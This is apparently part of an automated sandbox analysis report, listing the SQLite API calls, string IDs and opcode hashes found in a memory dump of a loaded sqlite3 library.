                                                    • API ID: sqlite3_get_auxdata$memcmpsqlite3_freesqlite3_mallocsqlite3_result_error_nomemsqlite3_set_auxdatasqlite3_value_bytessqlite3_value_text
                                                    • String ID:
                                                    • API String ID: 1733351873-0
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    Similarity
                                                    • API ID: Virtual$ProtectQueryabortfwritevfprintf
                                                    • String ID: @
                                                    • API String ID: 1503958624-2766056989
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    Similarity
                                                    • API ID: sqlite3_freesqlite3_mutex_entersqlite3_randomness$sqlite3_malloc64sqlite3_mutex_leave
                                                    • String ID:
                                                    • API String ID: 1657278834-0
                                                    APIs
                                                      • Part of subcall function 61E28A96: sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E5DAC5), ref: 61E28ADA
                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E5E29B
                                                    • sqlite3_prepare_v2.SQLITE3 ref: 61E5E2D9
                                                    • sqlite3_step.SQLITE3 ref: 61E5E32E
                                                    • sqlite3_errmsg.SQLITE3 ref: 61E5E4CB
                                                      • Part of subcall function 61E260ED: sqlite3_log.SQLITE3 ref: 61E26116
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    Similarity
                                                    • API ID: sqlite3_log$sqlite3_errmsgsqlite3_mutex_entersqlite3_prepare_v2sqlite3_step
                                                    • String ID:
                                                    • API String ID: 154587148-0
                                                    APIs
                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E760A9
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E764DA
                                                      • Part of subcall function 61E5EDE5: sqlite3_strnicmp.SQLITE3 ref: 61E5EE71
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    Similarity
                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leavesqlite3_strnicmp
                                                    • String ID: 2$foreign key$indexed$Wa
                                                    • API String ID: 100587609-469184487
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    Similarity
                                                    • API ID: memcmpsqlite3_value_text$sqlite3_freesqlite3_result_textsqlite3_value_bytes
                                                    • String ID:
                                                    • API String ID: 3386002893-0
                                                    • Opcode ID: a35b31c419476287316f38327b5cd54c7c4589c99523709e14bc00ec4569292a
                                                    • Instruction ID: c35453f19eaab3620c2f04098610e05978b850d7f039baea7e73aaca459f1df6
                                                    • Opcode Fuzzy Hash: a35b31c419476287316f38327b5cd54c7c4589c99523709e14bc00ec4569292a
                                                    • Instruction Fuzzy Hash: C2618EB1A042568FDB01CFACC4A069DBBF1AF89318F25C56ED8A5A7391E730C841CF55
                                                    APIs
                                                    Similarity
                                                    • API ID: Sleep_amsg_exit
                                                    • String ID:
                                                    • API String ID: 1015461914-0
                                                    • Opcode ID: 354b53e7159aa5500a78f9eacd42832eb55ecf60014174467c6247eb26b3b128
                                                    • Instruction ID: c2cc557666b7a1d0ad8e663bb2bdd622dd0eaded8891b7deae7852dca82b45fc
                                                    • Opcode Fuzzy Hash: 354b53e7159aa5500a78f9eacd42832eb55ecf60014174467c6247eb26b3b128
                                                    • Instruction Fuzzy Hash: 634160B0615A418BEB41AFE9C58531A7BF1BB8534DF64C92ED6888F380D775C491C782
                                                    APIs
                                                    • sqlite3_result_error.SQLITE3 ref: 61E3728A
                                                    • sqlite3_value_int.SQLITE3 ref: 61E3729C
                                                    • sqlite3_value_text.SQLITE3 ref: 61E372B2
                                                    • sqlite3_value_text.SQLITE3 ref: 61E372C0
                                                    • sqlite3_result_text.SQLITE3 ref: 61E373A2
                                                    • sqlite3_free.SQLITE3 ref: 61E373AD
                                                    • sqlite3_result_error_code.SQLITE3 ref: 61E373C3
                                                    Similarity
                                                    • API ID: sqlite3_value_text$sqlite3_freesqlite3_result_errorsqlite3_result_error_codesqlite3_result_textsqlite3_value_int
                                                    • String ID:
                                                    • API String ID: 2838836587-0
                                                    • Opcode ID: 3855afbaacf4b129cd0b7317c565d35260e7b804b081d1566384a005b6b5c84a
                                                    • Instruction ID: e555278e31a930ff02e48dd0edbcdffba914487cd3f5df86c882a03629ae4df9
                                                    • Opcode Fuzzy Hash: 3855afbaacf4b129cd0b7317c565d35260e7b804b081d1566384a005b6b5c84a
                                                    • Instruction Fuzzy Hash: 2A5162B4904359DFCB00DFA8C48569EBBF4AF88754F108929E898AB354E734D945CF51
                                                    APIs
                                                    Similarity
                                                    • API ID: sqlite3_value_blobsqlite3_value_bytessqlite3_value_text$memcmp
                                                    • String ID:
                                                    • API String ID: 2264764126-0
                                                    • Opcode ID: e87ec02c1dd4f7bd48c1d20cdebced10c1e7bc68b5234cf2f06e5fdbb4c9bb63
                                                    • Instruction ID: d70b033e98f18d3d0ca15199638216c8f6716ddfe36afa8d788cdfb617ff0c6c
                                                    • Opcode Fuzzy Hash: e87ec02c1dd4f7bd48c1d20cdebced10c1e7bc68b5234cf2f06e5fdbb4c9bb63
                                                    • Instruction Fuzzy Hash: F2315E71A146968BDB08DFA9C4A06ADFBE1EF8C314F25842EE868D7310E775D841CB51
                                                    APIs
                                                    • sqlite3_value_text.SQLITE3 ref: 61E389D3
                                                    • sqlite3_value_text.SQLITE3 ref: 61E38A02
                                                    • sqlite3_result_error_nomem.SQLITE3 ref: 61E38A27
                                                      • Part of subcall function 61E382CE: sqlite3_mprintf.SQLITE3 ref: 61E382E3
                                                      • Part of subcall function 61E382CE: sqlite3_result_error.SQLITE3 ref: 61E382F9
                                                      • Part of subcall function 61E382CE: sqlite3_free.SQLITE3 ref: 61E38301
                                                    Strings
                                                    Similarity
                                                    • API ID: sqlite3_value_text$sqlite3_freesqlite3_mprintfsqlite3_result_errorsqlite3_result_error_nomem
                                                    • String ID: insert$set
                                                    • API String ID: 832408550-3711289001
                                                    • Opcode ID: 7799c58935f586738ea74dbeb9fe4e998121244cdeeec933d262bd4c4b846a49
                                                    • Instruction ID: 42b5959de5a8f565ca5da52ecd0ca37d02c17e3196387ffdf7051dc380fadcef
                                                    • Opcode Fuzzy Hash: 7799c58935f586738ea74dbeb9fe4e998121244cdeeec933d262bd4c4b846a49
                                                    • Instruction Fuzzy Hash: EA314B70A042589FDB01DFA8C484A9DBBF5BFC4318F28C559E884CB355E735E946DB41
                                                    APIs
                                                    • sqlite3_result_error.SQLITE3 ref: 61E344FD
                                                    • sqlite3_result_error.SQLITE3 ref: 61E34560
                                                    Strings
                                                    Similarity
                                                    • API ID: sqlite3_result_error
                                                    • String ID: J
                                                    • API String ID: 497837271-1141589763
                                                    • Opcode ID: f30f63485dfa20c1efbbc25d3765887b7d1ffb0b52fa626ef55f80026b118446
                                                    • Instruction ID: abdb6cf436e1596d3b2e8d78752d3c56e484842776b47e80c5e41ef356ae7b56
                                                    • Opcode Fuzzy Hash: f30f63485dfa20c1efbbc25d3765887b7d1ffb0b52fa626ef55f80026b118446
                                                    • Instruction Fuzzy Hash: C6314F35A043959BD710EF78C885B4D7BA1AFC5318F20C96DF8988B385C739E885CB92
                                                    APIs
                                                    • sqlite3_value_text.SQLITE3 ref: 61E33E4D
                                                    • sqlite3_value_bytes.SQLITE3 ref: 61E33E57
                                                    • sqlite3_value_text.SQLITE3 ref: 61E33E81
                                                    • sqlite3_value_bytes.SQLITE3 ref: 61E33E8C
                                                    • sqlite3_result_error.SQLITE3 ref: 61E33ECC
                                                    Strings
                                                    Similarity
                                                    • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_result_error
                                                    • String ID: null
                                                    • API String ID: 1955785328-634125391
                                                    • Opcode ID: 68b3ddb521818ca5ef41147905fd37d5a62d62699609f5841b2f6d6d2bb391b8
                                                    • Instruction ID: dc9870807a04e3228e61a85712befee8dbb836e06eb27f704a895a60105716dc
                                                    • Opcode Fuzzy Hash: 68b3ddb521818ca5ef41147905fd37d5a62d62699609f5841b2f6d6d2bb391b8
                                                    • Instruction Fuzzy Hash: 281105B2B483504BD714DE6E9484619BBE2DBC9328F24C52EE5848B344D235C896C792
                                                    APIs
                                                    • sqlite3_aggregate_context.SQLITE3 ref: 61E327CC
                                                    • sqlite3_value_text.SQLITE3 ref: 61E327F5
                                                    • sqlite3_value_bytes.SQLITE3 ref: 61E32802
                                                    • sqlite3_value_text.SQLITE3 ref: 61E32827
                                                    • sqlite3_value_bytes.SQLITE3 ref: 61E32833
                                                    Strings
                                                    Similarity
                                                    • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_aggregate_context
                                                    • String ID: ,)?
                                                    • API String ID: 4225432645-1010226240
                                                    • Opcode ID: 243edcccd23f1fdd3acffced3a6b035112ac03142e80a75a60fbb7cc9f5662e4
                                                    • Instruction ID: 146a1ec40e7ca28d8e4d44351afad45f8546a73bc3f6b9f29888d3d8876476ab
                                                    • Opcode Fuzzy Hash: 243edcccd23f1fdd3acffced3a6b035112ac03142e80a75a60fbb7cc9f5662e4
                                                    • Instruction Fuzzy Hash: 12213876A046468FD710DF79C884A5ABBE5FFD8318F258429E998CB304E735E841CB81
                                                    APIs
                                                    • sqlite3_aggregate_context.SQLITE3 ref: 61E347D2
                                                    • sqlite3_result_error_nomem.SQLITE3 ref: 61E347F7
                                                    • sqlite3_result_text.SQLITE3 ref: 61E34824
                                                    • sqlite3_result_text.SQLITE3 ref: 61E3484A
                                                    • sqlite3_result_subtype.SQLITE3 ref: 61E3485A
                                                    Strings
                                                    Similarity
                                                    • API ID: sqlite3_result_text$sqlite3_aggregate_contextsqlite3_result_error_nomemsqlite3_result_subtype
                                                    • String ID: J
                                                    • API String ID: 3250357221-1141589763
                                                    • Opcode ID: b8e2c19c06d33d767a427b3e23f9cea282e3c87fa8310b7bf88711eac9cc4921
                                                    • Instruction ID: 4bdbf5e27a0d3cc01d15dff8d073131addd7688c5180e427c078862be1a21bef
                                                    • Opcode Fuzzy Hash: b8e2c19c06d33d767a427b3e23f9cea282e3c87fa8310b7bf88711eac9cc4921
                                                    • Instruction Fuzzy Hash: E2112AB0508791ABD700AF68C48131ABFE5AF85718F24C84EF8D88B345C37AC845CB92
                                                    APIs
                                                    • sqlite3_aggregate_context.SQLITE3 ref: 61E34696
                                                    • sqlite3_result_error_nomem.SQLITE3 ref: 61E346B9
                                                    • sqlite3_result_text.SQLITE3 ref: 61E346E6
                                                    • sqlite3_result_text.SQLITE3 ref: 61E3470C
                                                    • sqlite3_result_subtype.SQLITE3 ref: 61E3471C
                                                    Strings
                                                    Similarity
                                                    • API ID: sqlite3_result_text$sqlite3_aggregate_contextsqlite3_result_error_nomemsqlite3_result_subtype
                                                    • String ID: J
                                                    • API String ID: 3250357221-1141589763
                                                    • Opcode ID: dbbf009b67f7c3e662998250791786e0ed093e26d8a105de625a8d4e9c6078ea
                                                    • Instruction ID: 94ba5e957d0cfbe003597516d09a759e55d9c3860a3854fa7afee84d4290a1a7
                                                    • Opcode Fuzzy Hash: dbbf009b67f7c3e662998250791786e0ed093e26d8a105de625a8d4e9c6078ea
                                                    • Instruction Fuzzy Hash: D8115EB050C751ABE701AF68C48131ABFE4AF85758F24C84EE8D88B345D37AC855CB96
                                                    APIs
                                                      • Part of subcall function 61E28A4C: sqlite3_log.SQLITE3(?,?,?,?,?,61E28AFF), ref: 61E28A87
                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E29A18
                                                    • sqlite3_value_text16le.SQLITE3 ref: 61E29A2C
                                                    • sqlite3_value_text16le.SQLITE3 ref: 61E29A5A
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E29A6E
                                                    Strings
                                                    Similarity
                                                    • API ID: sqlite3_value_text16le$sqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
                                                    • String ID: bad parameter or other API misuse$out of memory
                                                    • API String ID: 3568942437-948784999
                                                    APIs
                                                    • sqlite3_mutex_enter.SQLITE3(?,?,?,61E140AD), ref: 61E0A98E
                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,61E140AD), ref: 61E0A9CA
                                                    • sqlite3_mutex_enter.SQLITE3(?,?,?,61E140AD), ref: 61E0A9E3
                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,61E140AD), ref: 61E0A9F6
                                                    • sqlite3_free.SQLITE3(?,?,?,61E140AD), ref: 61E0A9FE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    Similarity
                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_free
                                                    • String ID: La
                                                    • API String ID: 251237202-3337869896
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    Similarity
                                                    • API ID: sqlite3_free$sqlite3_logstrcmp
                                                    • String ID:
                                                    • API String ID: 2202632817-0
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    Similarity
                                                    • API ID: sqlite3_msize$sqlite3_mutex_entersqlite3_mutex_leave
                                                    • String ID:
                                                    • API String ID: 2585109301-0
                                                    APIs
                                                    • sqlite3_mprintf.SQLITE3 ref: 61E37C49
                                                      • Part of subcall function 61E3579B: sqlite3_initialize.SQLITE3 ref: 61E357A1
                                                      • Part of subcall function 61E3579B: sqlite3_vmprintf.SQLITE3 ref: 61E357BB
                                                    • sqlite3_free.SQLITE3 ref: 61E37D89
                                                    • sqlite3_free.SQLITE3 ref: 61E37D91
                                                      • Part of subcall function 61E3576D: sqlite3_free.SQLITE3 ref: 61E3577C
                                                      • Part of subcall function 61E3576D: sqlite3_vmprintf.SQLITE3 ref: 61E3578E
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    Similarity
                                                    • API ID: sqlite3_free$sqlite3_vmprintf$sqlite3_initializesqlite3_mprintf
                                                    • String ID:
                                                    • API String ID: 2044204354-0
                                                    APIs
                                                      • Part of subcall function 61E32D9A: sqlite3_realloc64.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,61E32E89), ref: 61E32DC9
                                                      • Part of subcall function 61E09293: memcmp.MSVCRT ref: 61E092ED
                                                      • Part of subcall function 61E09293: memcmp.MSVCRT ref: 61E09351
                                                    • sqlite3_malloc64.SQLITE3 ref: 61E33339
                                                      • Part of subcall function 61E1A768: sqlite3_initialize.SQLITE3 ref: 61E1A773
                                                    • memcmp.MSVCRT ref: 61E333F9
                                                    • sqlite3_free.SQLITE3 ref: 61E334D7
                                                    • sqlite3_log.SQLITE3 ref: 61E33588
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    Similarity
                                                    • API ID: memcmp$sqlite3_freesqlite3_initializesqlite3_logsqlite3_malloc64sqlite3_realloc64
                                                    • String ID:
                                                    • API String ID: 885863977-3916222277
                                                    APIs
                                                    • sqlite3_value_text.SQLITE3 ref: 61E238DC
                                                    • sqlite3_value_text.SQLITE3 ref: 61E238EA
                                                    • sqlite3_value_bytes.SQLITE3 ref: 61E238F7
                                                    • sqlite3_value_text.SQLITE3 ref: 61E23925
                                                    • sqlite3_result_error.SQLITE3 ref: 61E2394F
                                                    • sqlite3_result_int.SQLITE3 ref: 61E2398F
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    Similarity
                                                    • API ID: sqlite3_value_text$sqlite3_result_errorsqlite3_result_intsqlite3_value_bytes
                                                    • String ID:
                                                    • API String ID: 4226599549-0
                                                    APIs
                                                    • sqlite3_value_text.SQLITE3 ref: 61E3605C
                                                    • sqlite3_result_error.SQLITE3 ref: 61E3608B
                                                    • sqlite3_value_text.SQLITE3 ref: 61E360A0
                                                    • sqlite3_load_extension.SQLITE3 ref: 61E360BB
                                                    • sqlite3_result_error.SQLITE3 ref: 61E360D6
                                                    • sqlite3_free.SQLITE3 ref: 61E360E1
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    Similarity
                                                    • API ID: sqlite3_result_errorsqlite3_value_text$sqlite3_freesqlite3_load_extension
                                                    • String ID:
                                                    • API String ID: 356667613-0
                                                    APIs
                                                    • sqlite3_mprintf.SQLITE3 ref: 61E36ED5
                                                    • sqlite3_free.SQLITE3 ref: 61E36F01
                                                      • Part of subcall function 61E36CCB: sqlite3_vmprintf.SQLITE3 ref: 61E36CE4
                                                      • Part of subcall function 61E36CCB: sqlite3_mprintf.SQLITE3 ref: 61E36D02
                                                      • Part of subcall function 61E36CCB: sqlite3_free.SQLITE3 ref: 61E36D0E
                                                      • Part of subcall function 61E36CCB: sqlite3_free.SQLITE3 ref: 61E36D16
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    Similarity
                                                    • API ID: sqlite3_free$sqlite3_mprintf$sqlite3_vmprintf
                                                    • String ID: AND$NOT$xa
                                                    • API String ID: 966554101-279034770
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    Similarity
                                                    • API ID: sqlite3_log
                                                    • String ID: ha$ha$sa
                                                    • API String ID: 632333372-2244070284
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: invalid rootpage
                                                    • API String ID: 0-1762523506
                                                    • Opcode ID: 5a61af7cfbfc88d5f971109b8a6cdea22023a66a1cbafbcb419b40350794eee0
                                                    • Instruction ID: 00cafd991efb6cda9ffd5fc18ca92505cad169135932c76807a779978103835e
                                                    • Opcode Fuzzy Hash: 5a61af7cfbfc88d5f971109b8a6cdea22023a66a1cbafbcb419b40350794eee0
                                                    • Instruction Fuzzy Hash: 92419A74B442858FDB14CF79C480B9ABBF9AF89308F64C46DE8989B345DB30D941CB91
                                                    APIs
                                                    • sqlite3_value_text.SQLITE3 ref: 61E2E3C1
                                                    • sqlite3_value_text.SQLITE3 ref: 61E2E3CE
                                                    • sqlite3_value_text.SQLITE3 ref: 61E2E3DC
                                                    • sqlite3_result_text.SQLITE3 ref: 61E2E477
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    Similarity
                                                    • API ID: sqlite3_value_text$sqlite3_result_text
                                                    • String ID: i
                                                    • API String ID: 380805339-3865851505
                                                    • Opcode ID: f95084f25b57baf4b66a74d38261ec33e2a1ce0c6b87c402e721433789017f99
                                                    • Instruction ID: 9559b892366f2c95449c66171f3df98742f025d4f1d255014aa14abeccae82cf
                                                    • Opcode Fuzzy Hash: f95084f25b57baf4b66a74d38261ec33e2a1ce0c6b87c402e721433789017f99
                                                    • Instruction Fuzzy Hash: 8041E5B5A043559BCB10DFA9D89069DBBF5AF88314F24C82EE8A8D7350E734D8418F81
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    Similarity
                                                    • API ID: sqlite3_strglob
                                                    • String ID: $
                                                    • API String ID: 476814121-227171996
                                                    • Opcode ID: dd1cf2b7615aef4dc3f3eb03c6f23d474ef63dbfa2f3f3ec9f21b1e6ffe30ba6
                                                    • Instruction ID: 9b77f79746e7b089630f6321610e56b2304823d293c529c01db3eb7a9be47a4c
                                                    • Opcode Fuzzy Hash: dd1cf2b7615aef4dc3f3eb03c6f23d474ef63dbfa2f3f3ec9f21b1e6ffe30ba6
                                                    • Instruction Fuzzy Hash: EB21F469C0838689D7128BFAC9C035ABEF4FF8631BF28D55EC4D58B291E334D5A18742
                                                    APIs
                                                    • sqlite3_free.SQLITE3 ref: 61E199BF
                                                    • sqlite3_malloc.SQLITE3 ref: 61E19A55
                                                    • sqlite3_free.SQLITE3 ref: 61E19986
                                                      • Part of subcall function 61E09B91: sqlite3_mutex_enter.SQLITE3 ref: 61E09BB0
                                                    • sqlite3_free.SQLITE3 ref: 61E19BE4
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    Similarity
                                                    • API ID: sqlite3_free$sqlite3_mallocsqlite3_mutex_enter
                                                    • String ID:
                                                    • API String ID: 165182205-0
                                                    • Opcode ID: 1b7e44b832492debdfc773ef745fa59b6eb64cedce56c9ec94a4773bacdec98c
                                                    • Instruction ID: bcf0b8f1b00230fbbac471a347e8107d8a82dd17034fbca11808239b42ba477b
                                                    • Opcode Fuzzy Hash: 1b7e44b832492debdfc773ef745fa59b6eb64cedce56c9ec94a4773bacdec98c
                                                    • Instruction Fuzzy Hash: 0BA1BE75D08219CBDB04CFA9C485ACDFBF5BF88314F25852AE859AB348E774A945CF80
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    Similarity
                                                    • API ID: sqlite3_strnicmp
                                                    • String ID:
                                                    • API String ID: 1961171630-0
                                                    • Opcode ID: 78894e3eaa6a027dc97cd0a8028dece60d1268cce195ad7cb7ea5e694bf55259
                                                    • Instruction ID: df1f12e72a2859ae5a12c0a1f99e156b64d7389a3890013881fc9055af49df65
                                                    • Opcode Fuzzy Hash: 78894e3eaa6a027dc97cd0a8028dece60d1268cce195ad7cb7ea5e694bf55259
                                                    • Instruction Fuzzy Hash: B451D26154824589EB204ED8D4823F9BFA79F4230FFB9C81AD4A5D7251C27BC0BB8A43
                                                    APIs
                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,61E51699), ref: 61E51417
                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,61E51699), ref: 61E515A4
                                                    • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,61E51699), ref: 61E515B6
                                                    • sqlite3_free.SQLITE3 ref: 61E515CD
                                                    • sqlite3_free.SQLITE3 ref: 61E515D5
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    Similarity
                                                    • API ID: sqlite3_freesqlite3_mutex_leave$sqlite3_mutex_free
                                                    • String ID:
                                                    • API String ID: 2921195555-0
                                                    • Opcode ID: 6668c3821980a6ba005b62916d8d03ec78796282f91baf2ec2e65e321afd0553
                                                    • Instruction ID: 70ccdebb25a16ed697c96f7d0be7fa803769553c9d03ce7ccdcb343a6ccf923f
                                                    • Opcode Fuzzy Hash: 6668c3821980a6ba005b62916d8d03ec78796282f91baf2ec2e65e321afd0553
                                                    • Instruction Fuzzy Hash: 0F517E70A046928BDB50DFB9C88064ABBB1BF84318F29D56CCC599F305D735E866CBD0
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    Similarity
                                                    • API ID: sqlite3_mprintf$sqlite3_freesqlite3_malloc64sqlite3_realloc64
                                                    • String ID:
                                                    • API String ID: 4073198082-0
                                                    • Opcode ID: c3281f59ed2b4ac08a1f32b1d2e7403816ba17f610965e1ac0e023825d32e5a6
                                                    • Instruction ID: 0061d72e063ffea83067ca84fed3d21bf104225cb8f238b20a5b066e2f8c684a
                                                    • Opcode Fuzzy Hash: c3281f59ed2b4ac08a1f32b1d2e7403816ba17f610965e1ac0e023825d32e5a6
                                                    • Instruction Fuzzy Hash: 5F4158B0A04265DFDB04CF64C48465ABBF1FF88304F25C969EC598B34AD734EA51CBA1
                                                    APIs
                                                    • sqlite3_result_null.SQLITE3 ref: 61E34232
                                                    • sqlite3_result_int.SQLITE3 ref: 61E34251
                                                    • sqlite3_result_int64.SQLITE3 ref: 61E34306
                                                    • sqlite3_result_double.SQLITE3 ref: 61E3433A
                                                    • sqlite3_malloc.SQLITE3 ref: 61E34377
                                                    • sqlite3_result_text.SQLITE3 ref: 61E34420
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    Similarity
                                                    • API ID: sqlite3_mallocsqlite3_result_doublesqlite3_result_intsqlite3_result_int64sqlite3_result_nullsqlite3_result_text
                                                    • String ID:
                                                    • API String ID: 402655203-0
                                                    • Opcode ID: 8ca7462f907c8c9ac6c904370b9b78e2a08d52299e3fb7507fadcb7d6902035f
                                                    • Instruction ID: 608f3c3bc56e2b7b27a0d192572885cb02e710ace3b062af45ae1fbe359da44a
                                                    • Opcode Fuzzy Hash: 8ca7462f907c8c9ac6c904370b9b78e2a08d52299e3fb7507fadcb7d6902035f
                                                    • Instruction Fuzzy Hash: 3E414BB09092A59EDB10DFADD4946ADBBF1EBC9354F29C86ED494AB341C336C841CB12
                                                    APIs
                                                    • sqlite3_value_int.SQLITE3 ref: 61E3625C
                                                    • sqlite3_mprintf.SQLITE3 ref: 61E36317
                                                    • sqlite3_result_error_nomem.SQLITE3 ref: 61E36325
                                                    • sqlite3_free.SQLITE3 ref: 61E36347
                                                    • sqlite3_result_double.SQLITE3 ref: 61E36356
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    Similarity
                                                    • API ID: sqlite3_freesqlite3_mprintfsqlite3_result_doublesqlite3_result_error_nomemsqlite3_value_int
                                                    • String ID:
                                                    • API String ID: 2195261611-0
                                                    • Opcode ID: 69767f4d1b85f8c373da554171cfa31fdbc1bd9b9dc1a9c60ee5dfd172749cfc
                                                    • Instruction ID: cac3ea5ea3b523601826e98591fd48196cd69ceb8c7e174b526514db649ca0b5
                                                    • Opcode Fuzzy Hash: 69767f4d1b85f8c373da554171cfa31fdbc1bd9b9dc1a9c60ee5dfd172749cfc
                                                    • Instruction Fuzzy Hash: A2310570E09699DADF01BFA1D8805DDBBB0FFC8744F258849E88167314E736C955CB86
                                                    APIs
                                                      • Part of subcall function 61E1318F: sqlite3_mutex_try.SQLITE3(?,?,?,61E1320F), ref: 61E1312F
                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E51340
                                                    • sqlite3_mutex_free.SQLITE3 ref: 61E51381
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E51391
                                                    • sqlite3_free.SQLITE3 ref: 61E513C0
                                                    • sqlite3_free.SQLITE3 ref: 61E513DF
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    Similarity
                                                    • API ID: sqlite3_free$sqlite3_mutex_entersqlite3_mutex_freesqlite3_mutex_leavesqlite3_mutex_try
                                                    • String ID:
                                                    • API String ID: 1894464702-0
                                                    • Opcode ID: 8816bfa311ddcbd9584cf63fb411cfe114c5d3c031b778e6418011c236c52e69
                                                    • Instruction ID: bbcfd40fc2a5c0ae4c9e72134ab807e12015a72b749a92e61c3b10a6ba262932
                                                    • Opcode Fuzzy Hash: 8816bfa311ddcbd9584cf63fb411cfe114c5d3c031b778e6418011c236c52e69
                                                    • Instruction Fuzzy Hash: E4313070B04A428BD754DFA9C4D051A7BF6BFC5748B25C46DD8448B71AEB32D852CB81
                                                    APIs
                                                    • sqlite3_malloc.SQLITE3 ref: 61E1CEC2
                                                      • Part of subcall function 61E18306: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E17FE7,?,?,?,?,?,?,00000000,?,?,?,61E1E878), ref: 61E1830E
                                                    • memcmp.MSVCRT ref: 61E1CF34
                                                    • memcmp.MSVCRT ref: 61E1CF59
                                                    • memcmp.MSVCRT ref: 61E1CF8A
                                                    • memcmp.MSVCRT ref: 61E1CFB6
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    Similarity
                                                    • API ID: memcmp$sqlite3_initializesqlite3_malloc
                                                    • String ID:
                                                    • API String ID: 40721531-0
